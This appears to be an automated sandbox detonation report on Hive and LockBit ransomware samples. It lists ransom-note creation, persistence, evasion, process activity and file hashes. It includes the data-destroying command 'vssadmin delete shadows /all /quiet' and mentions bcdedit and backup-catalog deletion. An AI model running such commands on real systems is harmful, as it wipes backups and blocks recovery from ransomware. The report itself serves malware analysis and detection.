File created	C:\Windows\Microsoft.NET\Framework64\v3.5\es\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MUI\040C\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.CompilerServices.VisualC\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.resources\2.0.0.0_fr_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Data.Services.Design\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\System.Windows.Presentation.resources\3.5.0.0_ja_b77a5c561934e089\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\LiveKernelReports\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Boot\EFI\cs-CZ\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.DurableInstancing\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.OneNote\12.0.0.0__71e9bce111e9429c\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Browser Information Discovery

discovery

Delays execution with timeout.exe

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 760 wrote to memory of 2120	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2120	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2120	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2736	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2736	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2736	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 2120 wrote to memory of 2752	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2752	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2752	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2736 wrote to memory of 2768	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2736 wrote to memory of 2768	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2736 wrote to memory of 2768	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2120 wrote to memory of 2968	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2968	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2968	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2144	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2144	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2144	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2088	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2088	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2088	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2156	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2156	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2156	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2024	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2024	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2024	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1692	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1692	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1692	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2572	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2572	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2572	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1052	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1052	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1052	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2180	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2180	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2180	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 324	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 324	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 324	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2288	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2288	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2288	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2888	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2888	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2888	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2552	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2552	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2552	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2988	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2988	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2988	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1296	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1296	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1296	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 212	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 212	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 212	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1452	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1452	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1452	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

cmd /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

cmd /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

Network

N/A

Files

memory/760-0-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-1-0x00000000001F0000-0x00000000004C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5	6358d970c3edccb57eae7dbf9f42d58f
SHA1	25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256	9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512	44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5	df5552357692e0cba5e69f8fbf06abb6
SHA1	4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256	d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512	a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

C:\$Recycle.Bin\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini

MD5	2adc92efc54016e58eabc4fa55f131b1
SHA1	ffd5c3a7904ae370886a98330cc5675b99ee2c3f
SHA256	9bda481b38e6f4f1063bceda964fd68f1ffd7683c192de8d0755965791d8e27f
SHA512	7f0de144ea93cfae002ed5adb4efb3b7e57f6526cffd055b676130c832e44b27c1889df9c928ab8029cd14876dfdec884e417f8ffab8e1ac6d1e091a55aa9bbc

memory/760-42-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-272-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-944-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-1876-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-2807-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-3547-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-3931-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4303-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4304-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4305-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4306-0x00000000001F0000-0x00000000004C9000-memory.dmp

C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

MD5	ee4ad142674725d6d9b58c9c3bb836dc
SHA1	ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256	fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512	a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

memory/760-4873-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-8793-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-10792-0x00000000001F0000-0x00000000004C9000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

151s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\bcdedit.exe	N/A
N/A	N/A	C:\Windows\system32\bcdedit.exe	N/A

Renames multiple (3442) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\wbadmin.exe	N/A

Checks computer location settings

Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\""	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\F:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
